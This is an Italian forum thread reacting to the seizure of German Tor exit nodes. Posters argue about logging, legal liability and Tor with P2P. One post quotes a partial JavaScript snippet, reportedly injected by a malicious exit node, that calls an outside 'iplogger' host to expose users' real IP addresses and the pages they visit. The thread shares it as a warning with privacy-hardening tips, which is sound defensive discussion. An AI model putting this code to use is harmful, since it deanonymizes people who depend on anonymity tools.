sito di prodi, (o di berlusconi, paV condicio!) be'... e' comunquel colpa tua e sta a te dimostrare che non sei stato tu, ma qualcun altro mediante malware.E, credetemi, e' un bel cetriolo.Si, lo so, non e' un buon motivo per rendere illegale TOR, in definitiva si condanna lo strumento invece che dell'uso che ne viene fatto.Pero' e' cosi'.
    GT
    • Anonimo scrive:
      Re: Tor Illegale? MAGARI!
      - Scritto da: Guybrush
      Provocazione?
      No.infatti più che altro stupidaggini!Una perla per tutte!

      Per la legge (e il contratto che ha firmato)
      qualunque cosa vien fatta col suo account e' sua
      responsabilita' fino a prova
      contraria.Firmato? davvero? Hai (credo di no data la affermazione) una vaga idea di quanti contratti (non firmati) siano attivi e vengano attivati ogni giorno? 8) 8)
  • Anonimo scrive:
    Forse quest'anno...
    ....vincemo la coppa del monno!!!!!!!!!!!!Forza la Roma Maggica.
  • Anonimo scrive:
    quindi tor = inutile.
    se questo è possibile allora tor non serve a nulla.
    • Anonimo scrive:
      Re: quindi tor = inutile.
      - Scritto da:
      se questo è possibile allora tor non serve a
      nulla.Al contrario. Quei giudici rimarranno con un pugno di mosche. Normalmente un server tor non logga nulla. E se anche loggasse, avrebbero in mano solo il nodo tor successivo. Non arriverebbereo all'utente che ha commesso i presunti illeciti.L'unico effetto di questo bailamme sarà quello di scoraggiare gli amministratori tedeschi di server tor dal configurarlo come exit node.
      • Anonimo scrive:
        Re: quindi tor = inutile.

        L'unico effetto di questo bailamme sarà quello di
        scoraggiare gli amministratori tedeschi di server
        tor dal configurarlo come exit
        node.Esatto. Ed era quello che volevano, molto probabilmente. Missione compiuta.
        • Anonimo scrive:
          Re: quindi tor = inutile.
          - Scritto da:


          L'unico effetto di questo bailamme sarà quello
          di

          scoraggiare gli amministratori tedeschi di
          server

          tor dal configurarlo come exit

          node.

          Esatto. Ed era quello che volevano, molto
          probabilmente. Missione
          compiuta.Perchè mai?Non troveranno nulla, non potranno fare nulla e non si vede per quale motivo "gli amministratori tedeschi" non dovrebbero avere altre macchine (basta nulla) pronte all'uso... anzi per la cronaca a me risulta (indovina perchè :) ) che ci siano attualmente un certo numero di "exit node" funzionanti in germania... :p :p :p :p
          • Anonimo scrive:
            Re: quindi tor = inutile.
            - Scritto da:
            Non troveranno nulla, non potranno fare nulla potrebbero incriminarli per la mancanza dei log.Questo è l'aspetto più importante della faccenda.
            anzi per la
            cronaca a me risulta (indovina perchè :) ) che

            ci siano attualmente un certo numero di "exit
            node" funzionanti in
            germania...Magari gestiti da uqalcuno che logga bene tutto.E quando gli infiltrati che loggano saranno in numero sufficiente si potrà ricostruire prima alcune poi quasi tutte le comunicazioni anche grazie agli inevitabili log che stnno a monte (dal provider).
          • Anonimo scrive:
            Re: quindi tor = inutile.
            - Scritto da:
            - Scritto da:


            Non troveranno nulla, non potranno fare nulla

            potrebbero incriminarli per la mancanza dei log.
            Questo è l'aspetto più importante della faccenda.


            anzi per la

            cronaca a me risulta (indovina perchè :) ) che



            ci siano attualmente un certo numero di "exit

            node" funzionanti in

            germania...

            Magari gestiti da uqalcuno che logga bene tutto.
            E quando gli infiltrati che loggano saranno in
            numero sufficiente si potrà ricostruire prima
            alcune poi quasi tutte le comunicazioni anche
            grazie agli inevitabili log che stnno a monte
            (dal
            provider).Il numero degli 'infiltrati', per essere definito abbastanza, dev'essere in stretta relazione (molto maggiore) di quello degli utenti normali.Più si usa tor, più esso diventa sicuro, non vedo perchè non si possa fare da nodo tor in tutta tranquillità.Regoliamoci di conseguenza ;)
      • Anonimo scrive:
        Re: quindi tor = inutile.
        - Scritto da:

        - Scritto da:

        se questo è possibile allora tor non serve a

        nulla.

        Al contrario. Quei giudici rimarranno con un
        pugno di mosche. Normalmente un server tor non
        logga nulla. E se anche loggasse, avrebbero in
        mano solo il nodo tor successivo.che basta andare a beccare e quindi proseguire in questo modo.
        • Anonimo scrive:
          Re: quindi tor = inutile.
          - Scritto da:

          - Scritto da:



          - Scritto da:


          se questo è possibile allora tor non serve a


          nulla.



          Al contrario. Quei giudici rimarranno con un

          pugno di mosche. Normalmente un server tor non

          logga nulla. E se anche loggasse, avrebbero in

          mano solo il nodo tor successivo.


          che basta andare a beccare e quindi proseguire in
          questo
          modo."basterebbe".Rimane il fatto che tor non logga nulla, non hai nulla, nè nodi precedenti, nè nodi successivi, nè ip.
        • Anonimo scrive:
          Re: quindi tor = inutile.
          - Scritto da:

          - Scritto da:



          - Scritto da:


          se questo è possibile allora tor non serve a


          nulla.



          Al contrario. Quei giudici rimarranno con un

          pugno di mosche. Normalmente un server tor non

          logga nulla. E se anche loggasse, avrebbero in

          mano solo il nodo tor successivo.


          che basta andare a beccare e quindi proseguire in
          questo
          modo.Quale parte di "non logga nulla" non ti è chiara?
    • Guybrush scrive:
      Re: quindi tor = inutile.
      - Scritto da:
      se questo è possibile allora tor non serve a
      nulla.Au contraire.Quei nodi non contengono niente di rilevante, perche' la cipolla (tor) non registra niente.Senno' non sarebbe anonimo.Facevano prima a chiedere il log del provider a cui erano collegati quei nodi.Sarebbe stato meno difficile.(ROTFL)
      GT
    • Anonimo scrive:
      Re: quindi tor = inutile.
      - Scritto da:
      se questo è possibile allora tor non serve a
      nulla.Direi che è inutile il tuo post...o non hai letto o non hai capito un tubo!
      • Anonimo scrive:
        Re: quindi tor = inutile.
        - Scritto da:

        - Scritto da:

        se questo è possibile allora tor non serve a

        nulla.

        Direi che è inutile il tuo post...
        o non hai letto o non hai capito un tubo!sicuramente non è inutile e la tua stessa analisi propone due alternative, una delle quali dimostra quanto utile sia il mio post e quanto richieda approfondimento e/o risposta.bye
        • Anonimo scrive:
          Re: quindi tor = inutile.
          - Scritto da:

          - Scritto da:



          - Scritto da:


          se questo è possibile allora tor non serve a


          nulla.



          Direi che è inutile il tuo post...

          o non hai letto o non hai capito un tubo!

          sicuramente non è inutile e la tua stessa analisi
          propone due alternative, una delle quali dimostra
          quanto utile sia il mio post e quanto richieda
          approfondimento e/o
          risposta.
          Quale analisi?Io ho detto molto banalmente che non hai capito nulla!
          byeBye a te e rileggi!
  • Anonimo scrive:
    ma sanno cosa e' tor?
    "I giudici hanno anche rigettato le altre tesi presentate dai soggetti interessati all'indagine, spiegando che il sequestro è ammissibile in quanto, qualora vi siano dati rilevanti nei nodi sequestrati, questi avrebbero potuto essere cancellati dagli operatori se fosse stato chiesto loro di fornirli, cosa che non è potuta avvenire proprio grazie al blitz delle forze dei polizia.Infine, sottolineano i magistrati, il sequestro era l'unico modo per accedere a dati collegati a persone indagate ed è dunque da considerarsi legittimo."ma lo sanno che i router tor, proprio per la natura stessa di tor, non loggano? bha..
    • hulio scrive:
      Re: ma sanno cosa e' tor?
      Si che lo sanno gli è stato detto ma han detto che dato che non si può provare che quei dati non ci siano allora si procede col sequestro
      • Anonimo scrive:
        Re: ma sanno cosa e' tor?
        - Scritto da: hulio

        Si che lo sanno gli è stato detto ma han detto
        che dato che non si può provare che quei dati non
        ci siano allora si procede col
        sequestroAllucinante
        • Anonimo scrive:
          Re: ma sanno cosa e' tor?
          - Scritto da:

          - Scritto da: hulio



          Si che lo sanno gli è stato detto ma han detto

          che dato che non si può provare che quei dati
          non

          ci siano allora si procede col

          sequestro

          AllucinanteNon ci vedo niente di allucinante.Se non l'avesse fatto, sarebbe stato come se la scientifica non avesse confiscato un'auto coinvolta in un omicidio solo per il fatto che qualcuno gli avesse detto che quell'auto 'non lascia tracce'.
          • Anonimo scrive:
            Re: ma sanno cosa e' tor?
            - Scritto da:

            - Scritto da:



            - Scritto da: hulio





            Si che lo sanno gli è stato detto ma han detto


            che dato che non si può provare che quei dati

            non


            ci siano allora si procede col


            sequestro



            Allucinante

            Non ci vedo niente di allucinante.
            Se non l'avesse fatto, sarebbe stato come se la
            scientifica non avesse confiscato un'auto
            coinvolta in un omicidio solo per il fatto che
            qualcuno gli avesse detto che quell'auto 'non
            lascia
            tracce'.
            Esempio allucinante di cecità volontaria
          • Anonimo scrive:
            Re: ma sanno cosa e' tor?
            - Scritto da:
            Esempio allucinante di cecità volontariaL'unico cieco sei tu.Dove c'è un crimine vanno acquisite tutte gli indizi necessari.Se da quella macchina sono transitati dati illegali, possono esserci mille programmi che, indipendentemente da Tor hanno avuto la possibilità di loggareVa pertanto analizzato tutto ciò che c'è nel PC.
          • Anonimo scrive:
            Re: ma sanno cosa e' tor?
            - Scritto da:


            Si che lo sanno gli è stato detto ma


            han detto che dato che non si può


            provare che quei dati non ci


            siano allora si procede col sequestro

            Allucinante
            Non ci vedo niente di allucinante.
            Se non l'avesse fatto, sarebbe stato come
            se la scientifica non avesse confiscato
            un'auto coinvolta in un omicidio solo per
            il fatto che qualcuno gli avesse detto che
            quell'auto 'non lascia tracce'.No : e' come se la scientifica si fosse portata via dei bicchieri dove era evidente che le impronte non potessero essere rilevate.L'hanno fatto solo per andare a rompere le OO a chi ha messo su il nodo, come e' successo tante volte anche qui con autistici.
          • Anonimo scrive:
            Re: ma sanno cosa e' tor?
            - Scritto da:
            No : e' come se la scientifica si fosse portata
            via dei bicchieri dove era evidente che le
            impronte non potessero essere
            rilevate.Il discorso che fai è estremamente puerile e di ingenuità imbarazzante.Saresti un detective che Basettoni al tuo confronto vincerebbe il premio Holmes.Dove c'è un crimine vanno acquisite tutte gli indizi necessari.Se da quella macchina sono transitati dati illegali, possono esserci mille programmi che, indipendentemente da Tor hanno avuto la possibilità di loggareVa pertanto analizzato tutto ciò che c'è nel PC.
  • Anonimo scrive:
    wakko al tappeto
    ora che tor e' illegale...non ha piu' ragione di usare il pc.... 8)
    • Anonimo scrive:
      Re: wakko al tappeto
      - Scritto da:
      ora che tor e' illegale...non ha piu' ragione di
      usare il pc....
      8)Rileggiti l'articolo, pare che tu non ci abbia capito abbastanza.O forse non sai nemmeno come funzioni... tor.
    • Wakko Warner scrive:
      Re: wakko al tappeto
      - Scritto da:
      ora che tor e' illegale...non ha piu' ragione di
      usare il pc....
      8)Da quando è diventato illegale? (newbie)
      • Anonimo scrive:
        Re: wakko al tappeto
        - Scritto da: Wakko Warner

        - Scritto da:

        ora che tor e' illegale...non ha piu' ragione di

        usare il pc....

        8)

        Da quando è diventato illegale? (newbie)imbastisci pure il tuo stupido discorso su semantica ed epistemologia. Illegale o meno tor e' uno strumento che presto non potra' essere piu' usato e se veraa' utilizzato attirera' giustamente l'attenzione delle forze di giustizia.computer sequestrato, wakko incarcerato, godimento assicurato.
        • Wakko Warner scrive:
          Re: wakko al tappeto
          - Scritto da:

          - Scritto da: Wakko Warner



          - Scritto da:


          ora che tor e' illegale...non ha piu' ragione
          di


          usare il pc....


          8)



          Da quando è diventato illegale? (newbie)

          imbastisci pure il tuo stupido discorso su
          semantica ed epistemologia. Illegale o meno tor
          e' uno strumento che presto non potra' essere
          piu' usato e se veraa' utilizzato attirera'
          giustamente l'attenzione delle forze di
          giustizia.

          computer sequestrato, wakko incarcerato,
          godimento
          assicurato.Davvero? Te l'ha detto la Maga che ti fa le carte? (newbie)
        • Santos-Dumont scrive:
          Re: wakko al tappeto
          - Scritto da:

          - Scritto da: Wakko Warner



          - Scritto da:


          ora che tor e' illegale...non ha piu' ragione
          di


          usare il pc....


          8)



          Da quando è diventato illegale? (newbie)

          imbastisci pure il tuo stupido discorso su
          semantica ed epistemologia. Illegale o meno tor
          e' uno strumento che presto non potra' essere
          piu' usato e se veraa' utilizzato attirera'
          giustamente l'attenzione delle forze di
          giustizia.

          computer sequestrato, wakko incarcerato,
          godimento
          assicurato.Così per curiosità, eri a Falluja ed esponevi la bandiera della Repubblica Sociale sul lettuccio?Tanto per sapere. (rotfl)
      • Anonimo scrive:
        Re: wakko al tappeto
        - Scritto da: Wakko Warner

        - Scritto da:

        ora che tor e' illegale...non ha piu' ragione di

        usare il pc....

        8)

        Da quando è diventato illegale? (newbie)se diventasse illegale (c'è un articolo su pi che parla di una proposta di un giurista di rendere illegale tali strumenti), continueresti ad usarlo?
        • Anonimo scrive:
          Re: wakko al tappeto
          - Scritto da:

          - Scritto da: Wakko Warner



          - Scritto da:


          ora che tor e' illegale...non ha piu' ragione
          di


          usare il pc....


          8)



          Da quando è diventato illegale? (newbie)

          se diventasse illegale (c'è un articolo su pi che
          parla di una proposta di un giurista di rendere
          illegale tali strumenti), continueresti ad
          usarlo?ecco l'articolo di cui parlavohttp://punto-informatico.it/p.aspx?id=1447728
          • Wakko Warner scrive:
            Re: wakko al tappeto
            - Scritto da:

            - Scritto da:



            - Scritto da: Wakko Warner





            - Scritto da:



            ora che tor e' illegale...non ha piu'
            ragione

            di



            usare il pc....



            8)





            Da quando è diventato illegale? (newbie)



            se diventasse illegale (c'è un articolo su pi
            che

            parla di una proposta di un giurista di rendere

            illegale tali strumenti), continueresti ad

            usarlo?

            ecco l'articolo di cui parlavo
            http://punto-informatico.it/p.aspx?id=1447728E questa se non erro la mia risposta.http://punto-informatico.it/pm.aspx?id=1447728&m_id=1447813&r=PI
          • Anonimo scrive:
            Re: wakko al tappeto
            - Scritto da: Wakko Warner

            - Scritto da:



            - Scritto da:





            - Scritto da: Wakko Warner







            - Scritto da:




            ora che tor e' illegale...non ha piu'

            ragione


            di




            usare il pc....




            8)







            Da quando è diventato illegale? (newbie)





            se diventasse illegale (c'è un articolo su pi

            che


            parla di una proposta di un giurista di
            rendere


            illegale tali strumenti), continueresti ad


            usarlo?



            ecco l'articolo di cui parlavo

            http://punto-informatico.it/p.aspx?id=1447728

            E questa se non erro la mia risposta.
            http://punto-informatico.it/pm.aspx?id=1447728&m_i
            Non ti preoccupare wakko non è SOLO la tua risposta è quella di molti me compreso! :)
        • Wakko Warner scrive:
          Re: wakko al tappeto
          - Scritto da:

          - Scritto da: Wakko Warner



          - Scritto da:


          ora che tor e' illegale...non ha piu' ragione
          di


          usare il pc....


          8)



          Da quando è diventato illegale? (newbie)

          se diventasse illegale (c'è un articolo su pi che
          parla di una proposta di un giurista di rendere
          illegale tali strumenti), continueresti ad
          usarlo?Certamente.
    • Anonimo scrive:
      Re: wakko al tappeto
      - Scritto da:
      ora che tor e' illegale...non ha piu' ragione di
      usare il pc....
      8)dove hai letto che tor è illegale?
    • Santos-Dumont scrive:
      Re: wakko al tappeto
      - Scritto da:
      ora che tor e' illegale...non ha piu' ragione di
      usare il pc....
      8)Chi ha detto che è illegale?Riprova, sarai più fortunato. 8)
  • Wakko Warner scrive:
    Chissà cosa sperano di ottenere
    voglio dire... a parte diffondere il panico fra i detentori di exit-node, che senso ha un sequestro di questo tipo?Non serve ad individuare gli utenti.Non serve in alcun modo a ricavare informazioni di qualunque utilità per le indagini.Sembra proprio che il loro obiettivo non dichiarato sia appunto diffondere il panico... e niente altro... a meno che i tecnici a cui si affida la magistratura della Germania non siano dei totali inetti/incompetenti.Siccome non possono nulla, siccome la loro censura è del tutto inutile contro Tor... tentano di scoraggiare gli exit-node in Germania. Ma che faranno per gli exit-node all'estero?------A proposito, un suggerimento... quando usate Tor, usate SEMPRE Privoxy e, nel file di configurazione di Privoxy impedite il caricamento di Flash. Nel browser disabilitate sia Java che Javascript e assicuratevi che il vostro browser non spedisca i siti che visitate in giro (cosa che accade con estensioni tipo quella per visualizzare il Pagerank di Google o Alexa o tipo lo strumento anti-phishing di FF2). Esistono attacchi che sono in grado di rivelare il vostro IP se o Flash o Java o Javascript sono attivati.
    • Wakko Warner scrive:
      Attacco attraverso Javascript
      Proprio oggi (quindi questo è uno "SCOOP" :D ) un amico mi ha segnalato un attacco a Tor che ha incontrato mentre lo usava.Mi ha gentilmente mandato lo script che vi incollo qui sotto:[code] function PrivoxyWindowOpen(){return(null);} Moo function moo(id){ do_connect(id); setTimeout('moo("'+id+'")', 20000); return false; } function do_connect(id){ //alert(id); req = new XMLHttpRequest(); req.overrideMimeType('text/html'); req.open("GET", "http://scripts.mit.edu/~ecprice/iplogger.pl?id="+id); req.send(null); //req.getAllResponseHeaders(); } function startup(){ var idstr = "AAAAAAAAA";
      • Anonimo scrive:
        Re: Attacco attraverso Javascript
        ok, grazie come al solito per i suggerimenti, ma se ho tor e non sono esperto e' meglio che non lo uso, secondo quello che dici tu. tor non e' free? il buco sara' presto chiuso? (si accettano ipotesi:))
        • Wakko Warner scrive:
          Re: Attacco attraverso Javascript
          - Scritto da:
          ok, grazie come al solito per i suggerimenti, ma
          se ho tor e non sono esperto e' meglio che non lo
          uso, secondo quello che dici tu. tor non e' free?
          il buco sara' presto chiuso? (si accettano
          ipotesi:))Non è un buco di Tor.Non sfrutta una debolezza della rete Tor.Non c'è nessun buco da riparare in Tor (almeno per il momento).Semplicemente dice al tuo browser "collegati senza passare per Tor". Il punto debole è il browser o meglio... come è configurato.Da un certo punto di vista hai ragione quando dici che solo un esperto a questo punto può ritenersi ragionevolmente sicuro, ma dall'altro lato... quanto vale la tua libertà?La tua libertà, vale la pena di informarsi? Di _capire_ come funziona Tor e questi concetti? Di capire anche solo semplicemente come configurare il proprio browser affinché questi attacchi non siano possibili e di tenersi aggiornati su sviluppi futuri?Bé, questo lo puoi decidere tu, io posso decidere solo per me e posso dare suggerimenti a coloro che usano Tor in modo errato per il loro stesso bene... ma alla fine quello che deve fare "il passo" sei tu.Il PC non può essere visto come un elettrodomestico "normale", non è una TV o un frullatore o un forno a microonde. Non si può "premere sul pulsante di accensione e aspettare"... c'è bisogno di _capire_ come funziona per usarlo in modo corretto.Tor è uno strumento molto potente, può salvarti la vita (o anche solo salvarti dal carcere) se usato in modo appropriato... ma richiede una "lettura del manuale di istruzioni" e una conoscenza che non tutti hanno. Ma si ritorna sempre al punto di partenza... ossia alla domanda: "quanto vale per te la libertà?"Poi gli errori capitano a tutti, anche ai più esperti... non si può mai essere _certi_, si può solo essere _ragionevolmente sicuri_.La conoscenza delle tecnologie informatiche dovrebbe essere materiale di studio a scuola proprio per creare generazioni che siano più coscenti dei mezzi che usano, perché il futuro davanti a loro è nero... ma NERO sul serio. In futuro solo chi avrà una certa dimestichezza con questi strumenti potrà dire di _essere libero_... perché in futuro il controllo di massa sarà anche più accentuato di oggi. Sarà così diffuso che praticamente della privacy non ne avremo nemmeno più l'ombra.È importante saper usare questi strumenti, è più importante di quello che si pensi... se tenete alla libertà dei vostri figli _insegnateli loro_ e quindi _imparateli voi prima di tutto_.Poi scegliete, siamo dotati di libero arbitrio.
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: Wakko Warner

            - Scritto da:

            ok, grazie come al solito per i suggerimenti, ma

            se ho tor e non sono esperto e' meglio che non
            lo

            uso, secondo quello che dici tu. tor non e'
            free?

            il buco sara' presto chiuso? (si accettano

            ipotesi:))

            Non è un buco di Tor.
            Non sfrutta una debolezza della rete Tor.
            Non c'è nessun buco da riparare in Tor (almeno
            per il
            momento).

            Semplicemente dice al tuo browser "collegati
            senza passare per Tor". Il punto debole è il
            browser o meglio... come è
            configurato.

            Da un certo punto di vista hai ragione quando
            dici che solo un esperto a questo punto può
            ritenersi ragionevolmente sicuro, ma dall'altro
            lato... quanto vale la tua
            libertà?
            La tua libertà, vale la pena di informarsi? Di
            _capire_ come funziona Tor e questi concetti? Di
            capire anche solo semplicemente come configurare
            il proprio browser affinché questi attacchi non
            siano possibili e di tenersi aggiornati su
            sviluppi
            futuri?

            Bé, questo lo puoi decidere tu, io posso decidere
            solo per me e posso dare suggerimenti a coloro
            che usano Tor in modo errato per il loro stesso
            bene... ma alla fine quello che deve fare "il
            passo" sei
            tu.

            Il PC non può essere visto come un
            elettrodomestico "normale", non è una TV o un
            frullatore o un forno a microonde. Non si può
            "premere sul pulsante di accensione e
            aspettare"... c'è bisogno di _capire_ come
            funziona per usarlo in modo
            corretto.

            Tor è uno strumento molto potente, può salvarti
            la vita (o anche solo salvarti dal carcere) se
            usato in modo appropriato... ma richiede una
            "lettura del manuale di istruzioni" e una
            conoscenza che non tutti hanno.


            Ma si ritorna sempre al punto di partenza...
            ossia alla domanda: "quanto vale per te la
            libertà?"

            Poi gli errori capitano a tutti, anche ai più
            esperti... non si può mai essere _certi_, si può
            solo essere _ragionevolmente
            sicuri_.

            La conoscenza delle tecnologie informatiche
            dovrebbe essere materiale di studio a scuola
            proprio per creare generazioni che siano più
            coscenti dei mezzi che usano, perché il futuro
            davanti a loro è nero... ma NERO sul serio. In
            futuro solo chi avrà una certa dimestichezza con
            questi strumenti potrà dire di _essere libero_...
            perché in futuro il controllo di massa sarà anche
            più accentuato di oggi. Sarà così diffuso che
            praticamente della privacy non ne avremo nemmeno
            più
            l'ombra.

            È importante saper usare questi strumenti, è più
            importante di quello che si pensi... se tenete
            alla libertà dei vostri figli _insegnateli loro_
            e quindi _imparateli voi prima di
            tutto_.

            Poi scegliete, siamo dotati di libero arbitrio.Eh fin ora ho capito che ti si è schiantala la spacebar!Scherzi a parte wakko tor è utilizzabile anche via p2p? Mi passeresti gentilmente un link che spiega il discorso in maniera approfondita magar per linux?
          • Wakko Warner scrive:
            Re: Attacco attraverso Javascript
            - Scritto da:
            Eh fin ora ho capito che ti si è schiantala la
            spacebar!eh?
            Scherzi a parte wakko tor è utilizzabile anche
            via p2p? Mi passeresti gentilmente un link che
            spiega il discorso in maniera approfondita magar
            per
            linux?Tutto quello che può passare attraverso proxy socks può passare attraverso Tor quindi, in teoria, anche il P2P... sarebbe da provare... fino ad ora io ho provato solo navigazione web, irc e instant messaging... il P2P non l'ho mai provato.
          • Wakko Warner scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: Wakko Warner

            - Scritto da:

            Eh fin ora ho capito che ti si è schiantala la

            spacebar!

            eh?


            Scherzi a parte wakko tor è utilizzabile anche

            via p2p? Mi passeresti gentilmente un link che

            spiega il discorso in maniera approfondita magar

            per

            linux?

            Tutto quello che può passare attraverso proxy
            socks può passare attraverso Tor quindi, in
            teoria, anche il P2P... sarebbe da provare...
            fino ad ora io ho provato solo navigazione web,
            irc e instant messaging... il P2P non l'ho mai
            provato.Allora, ho fatto due prove con Amule.Ti permette di specificare un proxy Socks e si connette attraverso Tor ai vari server. Però sembra che la condivisione dei file passi _fuori_ da Tor (cioè che Amule usi quei proxy SOLO per connettersi ai server ma che lo scambio di file lo faccia fuori da Tor, magari comunicando il tuo IP reale ai vari client attraverso Tor... rendendo Tor di fatto inutile).Inoltre la risoluzione degli indirizzi la fa fuori da Tor (la conversione DNS dei nomi dei vari server in IP)... quindi così... a prima vista... direi che è inutile usare Tor con Amule.
          • Santos-Dumont scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: Wakko Warner

            - Scritto da: Wakko Warner



            - Scritto da:


            Eh fin ora ho capito che ti si è schiantala la


            spacebar!



            eh?




            Scherzi a parte wakko tor è utilizzabile anche


            via p2p? Mi passeresti gentilmente un link che


            spiega il discorso in maniera approfondita
            magar


            per


            linux?



            Tutto quello che può passare attraverso proxy

            socks può passare attraverso Tor quindi, in

            teoria, anche il P2P... sarebbe da provare...

            fino ad ora io ho provato solo navigazione web,

            irc e instant messaging... il P2P non l'ho mai

            provato.

            Allora, ho fatto due prove con Amule.
            Ti permette di specificare un proxy Socks e si
            connette attraverso Tor ai vari server. Però
            sembra che la condivisione dei file passi _fuori_
            da Tor (cioè che Amule usi quei proxy SOLO per
            connettersi ai server ma che lo scambio di file
            lo faccia fuori da Tor, magari comunicando il tuo
            IP reale ai vari client attraverso Tor...
            rendendo Tor di fatto
            inutile).

            Inoltre la risoluzione degli indirizzi la fa
            fuori da Tor (la conversione DNS dei nomi dei
            vari server in IP)... quindi così... a prima
            vista... direi che è inutile usare Tor con
            Amule.Beh, proprio stamattina leggevo una "sinossi" del funzionamento delle reti P2P sul sito di MUTE e quanto scrivi é del tutto ragionevole alla luce di quella spiegazione. La ricerca di un file da scaricare, se ho ben compreso, avviene passando attraverso i vari nodi arrivando fino a quello destinazione, ma il download della "merce ricercata" avviene punto a punto con un collegamento diretto tra i due IP.Ci vorrebbero, suppongo, dei client P2P intelligenti che instradino sulla rete TOR anche le richieste di download, ma non ho la minima idea di come (o se) sia possibile farlo. A titolo informativo riporto il link della spiegazione di cui sopra:http://mute-net.sourceforge.net/howPrivacy.shtml-----------------------------------------------------------Modificato dall' autore il 11 dicembre 2006 15.56-----------------------------------------------------------
          • tdimax scrive:
            Re: Attacco attraverso Javascript
            Modificato dall' autore il 11 dicembre 2006 15.56
            --------------------------------------------------Se non sbaglio, l'unico modo per non mostrare il proprio IP a *nessuno* escluso tor, sarebbe scaricare "la merce" PRIMA sull'exit-node. Dall'exit-node la merce dovrebbe passare su TUTTI i nodi tor per finire a me.Quindi se io scarico 1MB di dati, questi "saltano" da un nodo di tor all'altro fino a giungere a me.Non è una cosa possibile in quanto si intaserebbe la rete tor in tempo-zero...Correggetemi se sbaglio..
          • Santos-Dumont scrive:
            Re: Attacco attraverso Javascript

            Se non sbaglio, l'unico modo per non mostrare il
            proprio IP a *nessuno* escluso tor, sarebbe
            scaricare "la merce" PRIMA sull'exit-node.

            Dall'exit-node la merce dovrebbe passare su TUTTI
            i nodi tor per finire a
            me.
            Quindi se io scarico 1MB di dati, questi
            "saltano" da un nodo di tor all'altro fino a
            giungere a
            me.

            Non è una cosa possibile in quanto si intaserebbe
            la rete tor in
            tempo-zero...

            Correggetemi se sbaglio..A lume di naso hai ragione tu, ed è esattamente il modus operandi di Mute. Gli archivi da scaricare devono transitare per tutti i punti intermedi, punti identificati non mediante l'IP ma piuttosto attraverso un identificatore alternativo non riconducibile all'IP. Peccato che sia una rete pochissimo diffusa, a quanto dicono. Oggi l'ho provata sul PC al lavoro, ho scaricato un demplice documento sulle reti da poche centinaia di Kb e per la velocità di risposta e download posso dirmi soddisfatto.
          • Anonimo scrive:
            Re: Attacco attraverso Javascript

            tor è utilizzabile anche
            via p2p? Mi passeresti gentilmente un link che
            spiega il discorso in maniera approfondita magar
            per
            linux?p2psicuro.it c'è una pagina per azureus+tor, dove è sconsigliato di appesantire la rete tor con traffico p2p
          • shamael scrive:
            Re: Attacco attraverso Javascript
            Quella originale e' qua: http://azureus.sourceforge.net/doc/AnonBT/Tor/howto_0.5.htm
      • shamael scrive:
        Re: Attacco attraverso Javascript
        Mmm...fammi capire una cosa, cosa intendi per "era installato su un proxy all'MIT"? Intendi dire che un server che fa da nodo ospitava anche una pagina http con quello script?
        • Wakko Warner scrive:
          Re: Attacco attraverso Javascript
          - Scritto da: shamael
          Mmm...fammi capire una cosa, cosa intendi per
          "era installato su un proxy all'MIT"? Intendi
          dire che un server che fa da nodo ospitava anche
          una pagina http con quello
          script?Intendo che, in qualche modo, per qualche ragione, qualcuno ha modificato un exit-node di modo che inserisca l'iFrame con quello script in _ogni_ pagina WEB visitata da quell'exit-node.Cioè, immaginiamo che io chieda la pagina di www.libero.itL'exit-node farà la richiesta per me, ma oltre all'HTML di quella pagina mi ritornerà un HTML modificato di modo da contenere un iFrame che punta alla pagina contenente quello script.Per il mio browser la pagina di libero conterrà anche quell'iFrame e dunque quello script.Ma non solo, l'exit-node così modificato si memorizzerà anche l'indirizzo che sto visitanto e gli darà un ID, per esempio associerà l'ID "k3F2a" a "www.libero.it"Quando il mio browser "telefonerà a casa" con il suo vero IP passerà l'ID k3F2a al server "malevolo" e quindi sapranno il tuo IP _e_ la pagina che hai visitato.
          • shamael scrive:
            Re: Attacco attraverso Javascript
            Ah ok ora e' tutto piu' chiaro...Beh tutto sommato niente di eccessivamente preoccupante finche' si sta attenti a non disinserire tor prima di chiudere il browser.Se poi si imposta il firewall come consigliato dall'anonimo lo script non puo' comunque bypassare tor.Grazie dell'informazione comunque!
          • Wakko Warner scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: shamael
            Ah ok ora e' tutto piu' chiaro...
            Beh tutto sommato niente di eccessivamente
            preoccupante finche' si sta attenti a non
            disinserire tor prima di chiudere il
            browser.
            Se poi si imposta il firewall come consigliato
            dall'anonimo lo script non puo' comunque
            bypassare
            tor.

            Grazie dell'informazione comunque!Tuttavia se hai Flash attivato, siccome Flash ignora completamente le impostazioni del Proxy del browser... puoi essere facilmente loggato senza bisogno di "un tuo errore" preventivo.http://punto-informatico.it/f/m.aspx?m_id=1707989Cmq, prego. ;)Edit: Dimenticavo di dire che si... se il firewall è impostato in modo corretto anche questo attacco via Flash non è fattibile... resta il fatto che configurare il firewall in modo corretto è un'operazione noiosa e fuori dalla portata di molti utenti.-----------------------------------------------------------Modificato dall' autore il 11 dicembre 2006 02.36-----------------------------------------------------------
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: Wakko Warner
            - Scritto da: shamael

            Ah ok ora e' tutto piu' chiaro...

            Beh tutto sommato niente di eccessivamente

            preoccupante finche' si sta attenti a non

            disinserire tor prima di chiudere il

            browser.

            Se poi si imposta il firewall come consigliato

            dall'anonimo lo script non puo' comunque

            bypassare

            tor.



            Grazie dell'informazione comunque!

            Tuttavia se hai Flash attivato, siccome Flash
            ignora completamente le impostazioni del Proxy
            del browser... puoi essere facilmente loggato
            senza bisogno di "un tuo errore"
            preventivo.

            http://punto-informatico.it/f/m.aspx?m_id=1707989

            Cmq, prego. ;)


            Edit: Dimenticavo di dire che si... se il
            firewall è impostato in modo corretto anche
            questo attacco via Flash non è fattibile... resta
            il fatto che configurare il firewall in modo
            corretto è un'operazione noiosa e fuori dalla
            portata di molti
            utenti.Mah, con kerio personal firewall (ad esempio) non ci vuole tuta questa scienza e poi...http://punto-informatico.it/pm.aspx?m_id=1804729&id=1804412&r=PI Il PC non può essere visto come un elettrodomestico "normale", non è una TV o un frullatore o un forno a microonde. Non si può "premere sul pulsante di accensione e aspettare"... c'è bisogno di _capire_ come funziona per usarlo in modo corretto.
          • Wakko Warner scrive:
            Re: Attacco attraverso Javascript
            - Scritto da:
            Mah, con kerio personal firewall (ad esempio) non
            ci vuole tuta questa scienza e
            poi...
